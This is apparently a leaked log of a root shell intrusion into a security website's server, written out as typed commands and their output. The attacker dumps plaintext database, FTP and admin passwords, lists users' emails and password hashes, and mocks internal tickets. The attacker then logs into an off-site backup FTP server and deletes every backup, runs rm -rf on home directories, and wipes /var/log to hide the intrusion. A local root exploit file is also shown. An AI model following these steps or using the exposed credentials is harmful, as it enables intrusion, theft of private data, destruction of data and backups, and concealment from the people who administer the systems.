>> vi /etc/proftpd.passwd
>> service proftpd restart
>> locate proftpd.conf
>> vi /etc/proftpd.conf
>> vi /etc/proftpd.passwd
>> service proftpd restart
>> [snip]
>> /bin/sh /home/com/backup_system/backup.sh
>> tar cfv /home/com/backups/09-04-28_backup.tar
>> /home/com/public_html/admin
>> mysqldump -h localhost -u contrexxuser2 --password=0fEYNZgXz1pKe
>> com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql
>> mysqldump -h localhost -u contrexxuser2 --password=0fEYNZgXz1pKe
>> com_contrexx2 > 09-04-29-com_contrexx2-full.sql
>> ls -ali
>> mysqldump -h localhost -u com_user1 --password=Undv7gu29gvb5ikhS
>> com_contrexx > 07-04-29-com_contrexx-full.sql
>> mysqldump -h localhost -u com_user1 --password=Undv7gu29gvb5ikhS
>> ideapool > 07-04-29-ideapool-full.sql
>> crontab -l
>> crontab -l
>> php -q /home/com/public_html/modifications/cronjobs/securitynews.php
>> /home/com/public_html/modifications/cronjobs/exploits.sh
>> wget http://www.litespeedtech.com/packages/4.0/lsws-4.0.3-ent-
>> x86_64-linux.tar.gz
>> tar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz
>> cd lsws-4.0.3
>> sh install.sh
>> uptime
>> hdparm -tt /dev/sda
>> iostat
>> yum install iostat
>> iostat
>> whereis iostat
>> yjm clean all
>> yum clean all ; yum -y update
>> iostat
>> yum install systat
>> rpm -qa | grep iostat
>> rpm -qa | grep sysstat
>> rpm -qa | grep systat
>> dmesg -c
>> sysctl -p
>> uname -r
>> cd /usr/src
>> wget nix101.com/kernels/sstlinux.tar.gz
>> shutdown -r now
>> nano -w /boot/grub/grub.conf
>>
>> sh-3.2# cat .my.cnf
>> [client]
>> user=da_admin
>> password=X9dctmRH
>>
>> sh-3.2# cat /home/com/backup_system/backup.sh
>> #!/bin/sh
>> ####################################################################
>> #
>> #
>> #
>> #   incremental backup for astalavista.com
>> #
>> #
>> #
>> #   author:    Paulo M. Santos <paulo.santos@xxxxxxxxxxxxxxx>
>> #
>> #
>> #
>> ####################################################################
>> #
>> [snip]
>> PROG_DIR="/home/com/backup_system";
>> BACKUP_DIR="/home/com/backups";
>> DOBACKUP_FROM="/home/com/domains/astalavista.com/public_html";
>> # ftp for synology backup server
>> FTP_HOST="212.254.194.163";
>> FTP_PORT="21";
>> FTP_USER="astalavista.com";
>> FTP_PASS="yWHOJbzpWTWC6Xrmg1WnfBk5V";
>> FTP_DIR="/astalavista.com";
>> # database
>> DB_HOST="localhost";
>> DB_USER="contrexxuser2";
>> DB_PASS="0fEYNZgXz1pKe";
>> DB_DATABASE1="com_contrexx2_live";
>> DB_DATABASE2="com_contrexx2";
>> [snip]
>> ftp -in $FTP_HOST $FTP_PORT <<EOF
>> quote USER $FTP_USER
>> quote PASS $FTP_PASS
>> cd $FTP_DIR
>> put $DB_FULLNAME-SQL_Dump.tar
>> put $BACKUP_FULLNAME-Public_HTML.tar
>> close
>> bye
>> EOF
>>
>> sh-3.2# cd /home
>> sh-3.2# ls -la
>> total 120
>> drwxr-xr-x 14 root    root     4096 Mar 11 17:56 .
>> drwxr-xr-x 25 root    root     4096 Jun  3 02:43 ..
>> drwx--x--x  9 admin   admin    4096 Nov 28  2007 admin
>> -rw-------  1 root    root     8192 Jun  4 03:03 aquota.group
>> -rw-------  1 root    root     8192 Jun  3 02:45 aquota.user
>> drwx--x--x  6 astanet astanet  4096 Jun  4 09:51 astanet
>> drwxr-xr-x  2 root    root     4096 Jul 29  2008 backup
>> drwxr-xr-x  2 root    root     4096 Sep 17  2008 backup.14161
>> drwx--x--x 10 com     com      4096 Apr 28 12:40 com
>> drwxr-xr-x  2 root    root     4096 May 17  2007 ftp
>> drwx------  3 jon     jon      4096 Sep 21  2007 jon
>> drwx------  2 root    root    16384 Sep 11  2007 lost+found
>> drwxr-xr-x  2 root    root     4096 Sep 14  2007 my
>> drwxr-xr-x  5 mysql   mysql    4096 Sep 24  2007 mysqldata
>> drwx------  2 jon     jon      4096 Sep 15  2007 test
>> drwxrwxrwt  2 root    root     4096 Jul 29  2008 tmp
>>
>> sh-3.2# cd admin
>> sh-3.2# ls -la
>> total 1735896
>> drwx--x--x  9 admin admin       4096 Nov 28  2007 .
>> drwxr-xr-x 14 root  root        4096 Mar 11 17:56 ..
>> drwxrwxr-x  2 admin admin       4096 Oct 25  2007 admin_backups
>> drwx------  2 admin admin       4096 Sep 28  2007 backups
>> -rw-------  1 admin admin        860 Sep 17  2008 .bash_history
>> -rw-r--r--  1 admin admin         24 Sep 14  2007 .bash_logout
>> -rw-r--r--  1 admin admin        176 Sep 14  2007 .bash_profile
>> -rw-r--r--  1 admin admin        124 Sep 14  2007 .bashrc
>> drwxr-xr-x  2 root  root        4096 Sep 28  2007 com_backups
>> drwx--x--x  6 admin admin       4096 Sep 21  2007 domains
>> drwxrwx---  3 admin mail        4096 Sep 21  2007 imap
>> -rw-r--r--  1 root  root          24 Sep 21  2007 info.php
>> drwx------  2 admin admin       4096 Sep 21  2007 mail
>> -rw-r--r--  1 root  root         716 Nov 28  2007 server.csr
>> -rw-r--r--  1 root  root         887 Nov 28  2007 server.key
>> -rw-r-----  1 admin mail          34 Sep 14  2007 .shadow
>> -rw-r-----  1 admin com   1775711054 Oct 25  2007
>> user.admin.com.tar.gz
>> drwx--x--x  2 admin admin       4096 Jul 29  2008 user_backups
>>
>> sh-3.2# ..
>> sh-3.2# cd jon
>> sh-3.2# ls -la
>> total 36
>> drwx------  3 jon  jon  4096 Sep 21  2007 .
>> drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
>> -rw-------  1 jon  jon    53 Sep 21  2007 .bash_history
>> -rw-r--r--  1 jon  jon    24 Sep 21  2007 .bash_logout
>> -rw-r--r--  1 jon  jon   176 Sep 21  2007 .bash_profile
>> -rw-r--r--  1 jon  jon   124 Sep 21  2007 .bashrc
>> -rw-r--r--  1 root root   24 Sep 21  2007 info.php
>> drwxrwxr-x  2 jon  jon  4096 Sep 21  2007 public_html
>>
>> sh-3.2# cd ..
>> sh-3.2# cd test
>> sh-3.2# ls -la
>> total 48
>> drwx------  2 jon  jon  4096 Sep 15  2007 .
>> drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
>> -rw-------  1 jon  jon    79 Sep 21  2007 .bash_history
>> -rw-r--r--  1 jon  jon    24 Sep 15  2007 .bash_logout
>> -rw-r--r--  1 jon  jon   176 Sep 15  2007 .bash_profile
>> -rw-r--r--  1 jon  jon   124 Sep 15  2007 .bashrc
>> sh-3.2# cat .bash_history
>> /usr/bin/mysqladmin -u root password PoliuJhytg67
>>
>> sh-3.2# cd ..
>> sh-3.2# cd astanet
>> sh-3.2# ls -la
>> total 52
>> drwx--x--x  6 astanet astanet 4096 Jun  4 09:51 .
>> drwxr-xr-x 14 root    root    4096 Mar 11 17:56 ..
>> drwxr-xr-x  2 root    root    4096 Dec 23 16:00 auth
>> -rw-------  1 astanet astanet 3892 Apr 16 12:14 .bash_history
>> -rw-r--r--  1 astanet astanet   33 Dec 17 21:50 .bash_logout
>> -rw-r--r--  1 astanet astanet  176 Dec 17 21:50 .bash_profile
>> -rw-r--r--  1 astanet astanet  124 Dec 17 21:50 .bashrc
>> drwx--x--x  3 astanet astanet 4096 Dec 23 12:18 domains
>> drwxrwx---  3 astanet mail    4096 Dec 23 12:18 imap
>> drwx------  2 astanet astanet 4096 Dec 23 12:18 mail
>> -rw-------  1 astanet astanet  197 Jun  4 09:51 .mysql_history
>> lrwxrwxrwx  1 astanet astanet   37 Dec 23 12:18 public_html ->
>> ./domains/astalavista.net/public_html
>> -rw-r-----  1 astanet mail      34 Dec 22 12:41 .shadow
>>
>> sh-3.2# cd auth/
>> sh-3.2# ls -la
>> total 28
>> drwxr-xr-x 2 root    root    4096 Dec 23 16:00 .
>> drwx--x--x 6 astanet astanet 4096 Jun  4 09:51 ..
>> -rw-r--r-- 1 root    root     321 Jan  5  2006
>> hackercontest.config.inc.php
>> -rw-r--r-- 1 root    root     319 Jan  5  2006
>> hosting.config.inc.php
>> -rw-r--r-- 1 root    root      24 Jun  4 09:38 .htadm_pwd
>> -rw-r--r-- 1 root    root      49 Jan  5  2006 .htpasswd_newhosting
>> -rw-r--r-- 1 root    root      51 Oct 11  2006 .htwebalizer_pwd
>>
>> sh-3.2# cat hackercontest.config.inc.php
>> <?PHP
>> // Variabeln f?r Verbindung zur Datenbank //
>> $conxHost = 'localhost';                       // MySQL hostname
>> $conxUser = 'hackercontest';
>> // MySQL user
>> $conxPassword = 'K6m@7dUc';                    // MySQL password
>> $bfkey = 'cXvB3981';                                       //
>> Encryption/Decryption Key for Blowfish
>> ?>
>> sh-3.2# cat hosting.config.inc.php
>> <?PHP
>> // Variabeln f?r Verbindung zur Datenbank //
>> $conxHost = 'localhost';                       // MySQL hostname
>> $conxUser = 'hostinguser';                                 // MySQL
>> user
>> $conxPassword = 'cXvB3981';                    // MySQL password
>> $bfkey = 'cXvB3981';                                       //
>> Encryption/Decryption Key for Blowfish
>> ?>
>>
>> sh-3.2# cd ..
>> sh-3.2# cd com
>> sh-3.2# ls -la
>> total 141208
>> drwx--x--x 10 com  com       4096 Apr 28 12:40 .
>> drwxr-xr-x 14 root root      4096 Mar 11 17:56 ..
>> drwx------  2 com  com       4096 Jun  4 04:04 backups
>> -rw-r--r--  1 root root   2419504 Sep 28  2007 backup.sql
>> drwxr-xr-x  2 com  com       4096 May 12 15:20 backup_system
>> -rw-------  1 com  com      21880 Jun  2 08:07 .bash_history
>> -rw-r--r--  1 com  com         24 Sep 24  2007 .bash_logout
>> -rw-r--r--  1 com  com        176 Sep 24  2007 .bash_profile
>> -rw-r--r--  1 com  com        124 Sep 24  2007 .bashrc
>> drwx--x--x  3 com  com       4096 Jan 29  2008 domains
>> -rw-r--r--  1 com  com      16409 Jul 16  2008
>> FWUser.class.php.fixed
>> drwxrwx---  3 com  mail      4096 Jan  6 19:24 imap
>> -rw-------  1 com  com         69 Nov 18  2008 .lesshst
>> drwx------  2 com  com       4096 Sep 24  2007 mail
>> -rw-------  1 com  com      13970 Mar 28 21:42 .mysql_history
>> drwxr-xr-x  2 com  com       4096 Aug 20  2008 .ncftp
>> lrwxrwxrwx  1 com  com         37 Sep 24  2007 public_html ->
>> ./domains/astalavista.com/public_html
>> -rw-r-----  1 com  mail        34 Sep 24  2007 .shadow
>> drwx------  2 com  com       4096 Aug 26  2008 .ssh
>> -rwx------  1 com  com       8515 Feb 10  2008 t
>> -rw-rw-r--  1 com  com       6265 Feb 11  2008 t.c
>> drwxrwxr-x  2 com  com       4096 Jan 30 15:47 tmp
>> -rw-rw-r--  1 com  com        617 May 20  2008 .toprc
>> -rw-rw-r--  1 com  com  141851766 May 19  2008 version2-backup-
>> 20080519-0900.sql
>> -rw-------  1 com  com      16629 Mar 28 21:46 .viminfo
>> -rw-rw-r--  1 com  com         51 Aug 25  2008 .vimrc
>>
>> sh-3.2# head t.c
>> /*
>>  * jessica_biel_naked_in_my_bed.c
>>  *
>>  * Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
>>  * Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
>>  * Stejnak je to stare jak cyp a aj jakesyk rozbite.
>>  *
>>  * Linux vmsplice Local Root Exploit
>>  * By qaaz
>>  *
>>
>> sh-3.2# cd /
>> sh-3.2# ls -la
>> total 360
>> drwxr-xr-x  25 root root   4096 Jun  3 02:43 .
>> drwxr-xr-x  25 root root   4096 Jun  3 02:43 ..
>> -rw-------   1 root root  10240 Jun  3 02:39 aquota.group
>> -rw-------   1 root root  10240 Jun  3 02:39 aquota.user
>> -rw-r-----   1 root root    819 Jul 17  2008 astalavista.us.db
>> -rw-r--r--   1 root root      0 Jun  3 02:43 .autofsck
>> -rw-r--r--   1 root root      0 Sep 16  2007 .autorelabel
>> drwxr-xr-x   3 root root   4096 Dec 29  2007 backup
>> drwxr-xr-x   2 root root   4096 Jun  4 04:03 bin
>> drwxr-xr-x   5 root root   4096 Jun  2 14:06 boot
>> drwxr-xr-x  11 root root   3620 Jun  3 02:43 dev
>> drwxr-xr-x  84 root root  12288 Jun  4 03:16 etc
>> drwxr-xr-x  14 root root   4096 Mar 11 17:56 home
>> -rw-r--r--   1 root root  13387 Mar 20  2008 httpd.conf
>> drwxr-xr-x  11 root root   4096 Jun  4 04:02 lib
>> drwxr-xr-x   7 root root   4096 Jun  4 04:03 lib64
>> drwx------   2 root root  16384 Sep 11  2007 lost+found
>> drwxr-xr-x   2 root root   4096 Mar 11 17:56 media
>> drwxr-xr-x   2 root root      0 Jun  3 02:43 misc
>> drwxr-xr-x   2 root root   4096 Mar 11 17:56 mnt
>> -rw-r--r--   1 root root   5859 Feb  3  2008 mrtg.cfg
>> drwxr-xr-x   2 root root      0 Jun  3 02:43 net
>> drwxr-xr-x   3 root root   4096 Mar 11 17:56 opt
>> dr-xr-xr-x 264 root root      0 Jun  3 02:42 proc
>> drwxr-x---  15 root root   4096 Jun  4 08:40 root
>> drwxr-xr-x   2 root root  12288 Jun  4 04:03 sbin
>> drwxr-xr-x   2 root root   4096 Mar 11 17:56 selinux
>> drwxr-xr-x   2 root root   4096 Mar 11 17:56 srv
>> drwxr-xr-x  11 root root      0 Jun  3 02:42 sys
>> drwxrwxrwt   4 root root 122880 Jun  4 10:35 tmp
>> drwxr-xr-x  16 root root   4096 Jun  2 13:56 usr
>> drwxr-xr-x  26 root root   4096 Jun  4 03:16 var
>>
>> sh-3.2# cd opt
>> sh-3.2# ls -la
>> total 20
>> drwxr-xr-x  3 root root 4096 Mar 11 17:56 .
>> drwxr-xr-x 25 root root 4096 Jun  3 02:43 ..
>> drwxr-xr-x 15 root root 4096 Mar 20  2008 lsws
>>
>> sh-3.2# cd lsws/
>> sh-3.2# ls -la
>> total 108
>> drwxr-xr-x 15 root   root    4096 Mar 20  2008 .
>> drwxr-xr-x  3 root   root    4096 Mar 11 17:56 ..
>> drwxr-xr-x  8 root   root    4096 Mar 20  2008 add-ons
>> drwxr-xr-x 13 root   root    4096 May 29 15:10 admin
>> drwxr-xr-x  5 apache apache  4096 May 29 15:10 autoupdate
>> drwxr-xr-x  2 root   root    4096 May 29 15:10 bin
>> drwx------  4 apache apache  4096 Jun  3 02:43 conf
>> drwxr-xr-x  7 apache apache  4096 Mar 20  2008 DEFAULT
>> drwxr-xr-x  2 root   root    4096 Sep 15  2008 docs
>> drwxr-xr-x  2 root   root    4096 May 29 15:10 fcgi-bin
>> drwxr-xr-x  2 root   root    4096 Sep 15  2008 lib
>> -rw-r--r--  1 root   root    6959 May 29 15:10 LICENSE
>> -rw-r--r--  1 root   root    2214 May 29 15:10 LICENSE.OpenLDAP
>> -rw-r--r--  1 root   root    6279 May 29 15:10 LICENSE.OpenSSL
>> -rw-r--r--  1 root   root    3208 May 29 15:10 LICENSE.PHP
>> drwxr-xr-x  2 root   root   20480 Jun  4 09:55 logs
>> drwxr-xr-x  2 root   root    4096 Mar 20  2008 php
>> drwx------  2 apache apache  4096 Mar 20  2008 phpbuild
>> drwxr-xr-x  3 root   root    4096 Mar 20  2008 share
>> -rw-r--r--  1 root   root       6 May 29 15:10 VERSION
>>
>> sh-3.2# cd conf
>> sh-3.2# ls -la
>> total 48
>> drwx------  4 apache apache 4096 Jun  3 02:43 .
>> drwxr-xr-x 15 root   root   4096 Mar 20  2008 ..
>> drwx------  2 apache apache 4096 Mar 20  2008 cert
>> -rw-r--r--  1 apache apache 6668 May 29 15:13 httpd_config.xml
>> -rw-------  1 apache apache 6613 May 27 18:33 httpd_config.xml.bak
>> -rw-r--r--  1 root   apache    0 Jun  3 14:11 .last
>> -rw-------  1 apache apache  256 May 29 15:10 license.key
>> -rw-------  1 apache apache  256 Mar 21  2008 license.key.old
>> -rw-------  1 apache apache 3320 Mar 20  2008 mime.properties
>> -rw-------  1 apache apache   20 May 29 15:10 serial.no
>> drwx------  2 apache apache 4096 Mar 20  2008 templates
>>
>> sh-3.2# cat serial.no
>> IbDl-oVsO-CKqL-wVRa
>>
>> sh-3.2# mysql
>> Welcome to the MySQL monitor.  Commands end with ; or \g.
>> Your MySQL connection id is 286844
>> Server version: 5.0.45-community-log MySQL Community Edition (GPL)
>>
>> Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
>>
>> mysql> show databases;
>> +-----------------------+
>> | Database              |
>> +-----------------------+
>> | information_schema    |
>> | astanet_ads           |
>> | astanet_mailing_lists |
>> | astanet_mediawiki     |
>> | astanet_membersystem  |
>> | com_contrexx          |
>> | com_contrexx2         |
>> | com_contrexx2_live    |
>> | da_roundcube          |
>> | dolphin               |
>> | ideapool              |
>> | mysql                 |
>> | test                  |
>> | yourmaster            |
>> +-----------------------+
>> 14 rows in set (0.00 sec)
>>
>> mysql> use ideapool
>> Database changed
>> mysql> show tables;
>> +-----------------------------------+
>> | Tables_in_ideapool                |
>> +-----------------------------------+
>> | eventum_columns_to_display        |
>> | eventum_custom_field              |
>> | eventum_custom_field_option       |
>> | eventum_custom_filter             |
>> | eventum_customer_account_manager  |
>> | eventum_customer_note             |
>> | eventum_email_account             |
>> | eventum_email_draft               |
>> | eventum_email_draft_recipient     |
>> | eventum_email_response            |
>> | eventum_faq                       |
>> | eventum_faq_support_level         |
>> | eventum_group                     |
>> | eventum_history_type              |
>> | eventum_irc_notice                |
>> | eventum_issue                     |
>> | eventum_issue_association         |
>> | eventum_issue_attachment          |
>> | eventum_issue_attachment_file     |
>> | eventum_issue_checkin             |
>> | eventum_issue_custom_field        |
>> | eventum_issue_history             |
>> | eventum_issue_quarantine          |
>> | eventum_issue_requirement         |
>> | eventum_issue_user                |
>> | eventum_issue_user_replier        |
>> | eventum_link_filter               |
>> | eventum_mail_queue                |
>> | eventum_mail_queue_log            |
>> | eventum_news                      |
>> | eventum_note                      |
>> | eventum_phone_support             |
>> | eventum_project                   |
>> | eventum_project_category          |
>> | eventum_project_custom_field      |
>> | eventum_project_email_response    |
>> | eventum_project_field_display     |
>> | eventum_project_group             |
>> | eventum_project_link_filter       |
>> | eventum_project_news              |
>> | eventum_project_phone_category    |
>> | eventum_project_priority          |
>> | eventum_project_release           |
>> | eventum_project_round_robin       |
>> | eventum_project_status            |
>> | eventum_project_status_date       |
>> | eventum_project_user              |
>> | eventum_reminder_action           |
>> | eventum_reminder_action_list      |
>> | eventum_reminder_action_type      |
>> | eventum_reminder_field            |
>> | eventum_reminder_history          |
>> | eventum_reminder_level            |
>> | eventum_reminder_level_condition  |
>> | eventum_reminder_operator         |
>> | eventum_reminder_priority         |
>> | eventum_reminder_requirement      |
>> | eventum_reminder_triggered_action |
>> | eventum_resolution                |
>> | eventum_round_robin_user          |
>> | eventum_search_profile            |
>> | eventum_status                    |
>> | eventum_subscription              |
>> | eventum_subscription_type         |
>> | eventum_support_email             |
>> | eventum_support_email_body        |
>> | eventum_time_tracking             |
>> | eventum_time_tracking_category    |
>> | eventum_user                      |
>> +-----------------------------------+
>> 69 rows in set (0.00 sec)
>>
>> mysql> describe eventum_user;
>> +-------------------------+------------------+------+-----+---------
>> ------------+----------------+
>> | Field                   | Type             | Null | Key | Default
>>            | Extra          |
>> +-------------------------+------------------+------+-----+---------
>> ------------+----------------+
>> | usr_id                  | int(11) unsigned | NO   | PRI | NULL
>>            | auto_increment |
>> | usr_grp_id              | int(11) unsigned | YES  | MUL | NULL
>>            |                |
>> | usr_customer_id         | int(11) unsigned | YES  |     | NULL
>>            |                |
>> | usr_customer_contact_id | int(11) unsigned | YES  |     | NULL
>>            |                |
>> | usr_created_date        | datetime         | NO   |     | 0000-00-
>> 00 00:00:00 |                |
>> | usr_status              | varchar(8)       | NO   |     | active
>>            |                |
>> | usr_password            | varchar(32)      | NO   |     |
>>            |                |
>> | usr_full_name           | varchar(255)     | NO   |     |
>>            |                |
>> | usr_email               | varchar(255)     | NO   | UNI |
>>            |                |
>> | usr_preferences         | longtext         | YES  |     | NULL
>>            |                |
>> | usr_sms_email           | varchar(255)     | YES  |     | NULL
>>            |                |
>> | usr_clocked_in          | tinyint(1)       | YES  |     | 0
>>            |                |
>> | usr_lang                | varchar(5)       | YES  |     | NULL
>>            |                |
>> +-------------------------+------------------+------+-----+---------
>> ------------+----------------+
>> 13 rows in set (0.00 sec)
>>
>> mysql> select usr_full_name,usr_email,usr_password from
>> eventum_user;
>> +----------------------+-------------------------------+------------
>> ----------------------+
>> | usr_full_name        | usr_email                     |
>> usr_password                     |
>> +----------------------+-------------------------------+------------
>> ----------------------+
>> | system               | system-account@xxxxxxxxxxx    |
>> 14589714398751513457adf349173434 |
>> | Developer (Paulo)    | paulo.santos@xxxxxxxxxxxxxx   |
>> 26a35a1cf8895c27fb37ef4cf149f7bb |
>> | Be1er0ph0r           | be1er0ph0r@xxxxxx             |
>> 229766dc0ca1fb67160a8782321dfdce |
>> | Admin                | pascal.mittner@xxxxxxxxxxxxxx |
>> 57c2877c1d84c4b49f3289657deca65c |
>> | ADMIN                | admin@xxxxxxxxxxxxxx          |
>> f6fdffe48c908deb0f4c3bd36c032e72 |
>> | USER                 | user@xxxxxxxxxxxxxx           |
>> 5cc32e366c87c4cb49e4309b75f57d64 |
>> | Glafkos - (nowayout) | glafkos@xxxxxxxxxxxxxxx       |
>> f7735ab119023a8abb2301e67f81cd67 |
>> | Joao                 | joao.pontes@xxxxxxxxxxxxxxx   |
>> f805c071d7c823b937448c54c047b9fd |
>> | Pascal               | pm@xxxxxxxxxxxxxx             |
>> e10adc3949ba59abbe56e057f20f883e |
>> | commander            | commander@xxxxxxxxxxxxxxx     |
>> 932cd250918f881d41feb0b93883a926 |
>> | ishtus               | ishtus@xxxxxxxxxxxxxxx        |
>> a587ffc88b3dbbba3fd2fe67af649ff0 |
>> | sykadul              | sykadul@xxxxxxxxxxxxxxx       |
>> 20224a2f3eeb57a13a10b4df543c128e |
>> | Zach McElroy         | admin@xxxxxxxxxx              |
>> 33c5d4954da881814420f3ba39772644 |
>> | usb                  | usbenigma@xxxxxxxxxxxx        |
>> b513f22c3db6932855ad732f5f8a10a2 |
>> | cyph3r               | cyph3r@xxxxxxxxxxxxxxx        |
>> 6e1e50017a945e874d52ec91f9ab2cee |
>> +----------------------+-------------------------------+------------
>> ----------------------+
>> 15 rows in set (0.00 sec)
>>
>> mysql> select iss_description from eventum_issue where iss_id = 43;
>> +-------------------------------------------------------------------
>> --------------------------------------------------------------------
>> --------------------------------------------------------------------
>> --------------------------------------------------------------------
>> --------------------------------------------------------------------
>> --------------------------------------------------------------------
>> --------------------------------------------------------------------
>> --------------------------------------------------------------------
>> --------------------------------------------------------------------
>> --------------+
>> | iss_description
>>
>>
>>
>>
>>
>>
>>
>>
>>              |
>> +-------------------------------------------------------------------
>> --------------------------------------------------------------------
>> --------------------------------------------------------------------
>> --------------------------------------------------------------------
>> --------------------------------------------------------------------
>> --------------------------------------------------------------------
>> --------------------------------------------------------------------
>> --------------------------------------------------------------------
>> --------------------------------------------------------------------
>> --------------+
>> | Ok guys, to boost our traffic and revenue what we have to do is
>> keep users logged in... how to do that? well think about it... if a
>> user is watching a movie... he'll be connected for 90 mins...
>> 120mins... so what i propose is something like:
>> http://www.surfthechannel.com/
>> since they only provide LINKS to the movies they are LEGAL and
>> don't break DMCA rules... so we could do the same... "iframe" the
>> content on our website or use a system like podcast that uses our
>> own flash player to stream content from other places, therefore the
>> content NOT BEING HOSTED ON OUR SERVERS but only viewed... which
>> doesn't break any laws as far as i am aware (we should research on
>> that just to be sure though!) Of course we would have to provide
>> users with the button to take the content off if they think it
>> breaks copyright laws and we will remove it... i think that makes
>> it on the border of DMCA...
>>
>> We could also put advertisement during play on the flash video
>> player itself... extra $$...
>>
>> By sykadul |
>> +-------------------------------------------------------------------
>> --------------------------------------------------------------------
>> --------------------------------------------------------------------
>> --------------------------------------------------------------------
>> --------------------------------------------------------------------
>> --------------------------------------------------------------------
>> --------------------------------------------------------------------
>> --------------------------------------------------------------------
>> --------------------------------------------------------------------
>> --------------+
>> 1 row in set (0.00 sec)
>>
>> // Money and extra $$ is all they care about. remember that.
>>
>> mysql> select iss_summary,iss_description from eventum_issue where
>> iss_id =42;
>> +------------------------+------------------------------------------
>> --------------------------------------------------------------------
>> --------------------------------------------------------------------
>> ---------------------------------------------------------+
>> | iss_summary            | iss_description
>>
>>
>>                                                         |
>> +------------------------+------------------------------------------
>> --------------------------------------------------------------------
>> --------------------------------------------------------------------
>> ---------------------------------------------------------+
>> | Forum for REAL EXPERTS | Hello,
>>
>>                                Ishtus and I,
>>
>>                                Came up with a crazy and very workable and
>> professional idea.
>> We create an invitation only forum with the BEST security experts
>> worldwide ONLY. Security Experts from Bugtraq lists, exploit
>> writters, reverse engineers etc..
>>
>>                                One example a friend of mine from
>> coresecurity.com!
>>
>>                                We could have big projects etc.. and we can
>> work all together
>> to bring to the security community exploits, open source software
>> etc..
>>
>> |
>> +------------------------+------------------------------------------
>> --------------------------------------------------------------------
>> --------------------------------------------------------------------
>> --------------------------------------------------------+
>> 1 row in set (0.00 sec)
>>
>> // What an awesome yet original idea Ishtus and him... bring MORE
>> security "experts", thats exactly what the world needs...
>>
>> mysql> select iss_summary,iss_description from eventum_issue where
>> iss_id = 16;
>> +------------------+------------------------------------------------
>> ---------------------------------------------+
>> | iss_summary      | iss_description
>>                                             |
>> +------------------+------------------------------------------------
>> ---------------------------------------------+
>> | Website guidance | Virtual Girl which guides you trought the
>> website.
>>
>>                        We need a girl with who you can ( talk )!!!
>>                        Also for the News!
>>                        So my suggestion is a girl who read you the news
>> loud if you
>> like!
>>                        you can choose between read yourselfe or she read
>> it for you or
>> both!
>>
>>                        Go to www.heise.de! There is an example for Voice
>> News! It's a
>> good thing!!!
>>
>>                        Have a look on the example girls!!
>>
>>                        http://www.yaoti.com/de/free_yaoti.html
>>
>>                        or that
>>
>>                        http://www.yellostrom.de/
>>
>> |
>> +------------------+------------------------------------------------
>> ---------------------------------------------+
>> 1 row in set (0.00 sec)
>>
>> // ha ha.
>>
>> mysql> select iss_summary,iss_description from eventum_issue where
>> iss_id = 7;
>> +--------------------------+----------------------------------------
>> -------------------------------------------------------------------+
>> | iss_summary              | iss_description
>>                                                                   |
>> +--------------------------+----------------------------------------
>> -------------------------------------------------------------------+
>> | Exploit Development Team | We need an exploit development team to
>> focus on exploit research and publication under Astalavista name.  |
>> +--------------------------+----------------------------------------
>> -------------------------------------------------------------------+
>> 1 row in set (0.00 sec)
>>
>> // LOL.
>>
>> mysql> exit
>> Bye
>>
>>
>> sh-3.2# ftp 212.254.194.163
>> Connected to 212.254.194.163.
>> 220 BackupCOM_VW FTP server ready.
>> 504 AUTH: security mechanism 'GSSAPI' not supported.
>> 504 AUTH: security mechanism 'KERBEROS_V4' not supported.
>> KERBEROS_V4 rejected as an authentication type
>> Name (212.254.194.163:root): astalavista.com
>> 331 Password required for astalavista.com.
>> Password:
>> 230 User astalavista.com logged in.
>> Remote system type is UNIX.
>> Using binary mode to transfer files.
>> ftp> ls -la
>> 227 Entering Passive Mode (212,254,194,163,2,188)
>> 150 Opening BINARY mode data connection for 'file list'.
>> dr-x------   1 root users         4096 Jun  4 06:13 astalavista.com
>> 226 Transfer complete.
>> ftp> cd astalavista.com
>> 250 CWD command successful.
>> ftp> ls -la
>> 227 Entering Passive Mode (212,254,194,163,2,189)
>> 150 Opening BINARY mode data connection for 'file list'.
>> -rw-rw-rw-   1 astalavista.com users     23410936878 Apr 29 22:10
>> 09-04-28-astacom_full.tar
>> -rw-rw-rw-   1 astalavista.com users     20617651590 Apr 29 14:18
>> 09-04-28-astacom_full.tar.bz2
>> -rw-rw-rw-   1 astalavista.com users        88287111 Apr 29 15:57
>> 09-04-29-astacom_sql_full.sql.tar.bz2
>> -rw-rw-rw-   1 astalavista.com users     26413034040 May  2 00:21
>> 09-05-01-astacom-Public_HTML.tar
>> -rw-rw-rw-   1 astalavista.com users       277843549 May  1 17:29
>> 09-05-01-astacom-SQL_Dump.tar
>> [snip]
>> 226 Transfer complete.
>> ftp> mdelete *
>> ftp> ls -la
>> 227 Entering Passive Mode (212,254,194,163,2,193)
>> 150 Opening BINARY mode data connection for 'file list'.
>> 226 Transfer complete.
>> ftp>
>>
>> sh-3.2# cd /home
>> sh-3.2# ls -la
>> total 120
>> drwxr-xr-x 14 root    root     4096 Mar 11 17:56 .
>> drwxr-xr-x 25 root    root     4096 Jun  3 02:43 ..
>> drwx--x--x  9 admin   admin    4096 Nov 28  2007 admin
>> -rw-------  1 root    root     8192 Jun  4 03:03 aquota.group
>> -rw-------  1 root    root     8192 Jun  3 02:45 aquota.user
>> drwx--x--x  6 astanet astanet  4096 Jun  4 09:51 astanet
>> drwxr-xr-x  2 root    root     4096 Jul 29  2008 backup
>> drwxr-xr-x  2 root    root     4096 Sep 17  2008 backup.14161
>> drwx--x--x 10 com     com      4096 Apr 28 12:40 com
>> drwxr-xr-x  2 root    root     4096 May 17  2007 ftp
>> drwx------  3 jon     jon      4096 Sep 21  2007 jon
>> drwx------  2 root    root    16384 Sep 11  2007 lost+found
>> drwxr-xr-x  2 root    root     4096 Sep 14  2007 my
>> drwxr-xr-x  5 mysql   mysql    4096 Sep 24  2007 mysqldata
>> drwx------  2 jon     jon      4096 Sep 15  2007 test
>> drwxrwxrwt  2 root    root     4096 Jul 29  2008 tmp
>>
>> sh-3.2# rm -rf backup/
>> sh-3.2# rm -rf backup.14161/
>> sh-3.2# rm -rf ftp/
>> sh-3.2# rm -rf jon/
>> sh-3.2# rm -rf my/
>> sh-3.2# rm -rf mysqldata/
>> sh-3.2# rm -rf test/
>> sh-3.2# rm -rf tmp/
>> sh-3.2# cd ~
>> sh-3.2# rm -rf *
>> sh-3.2# rm -rf /var/log/
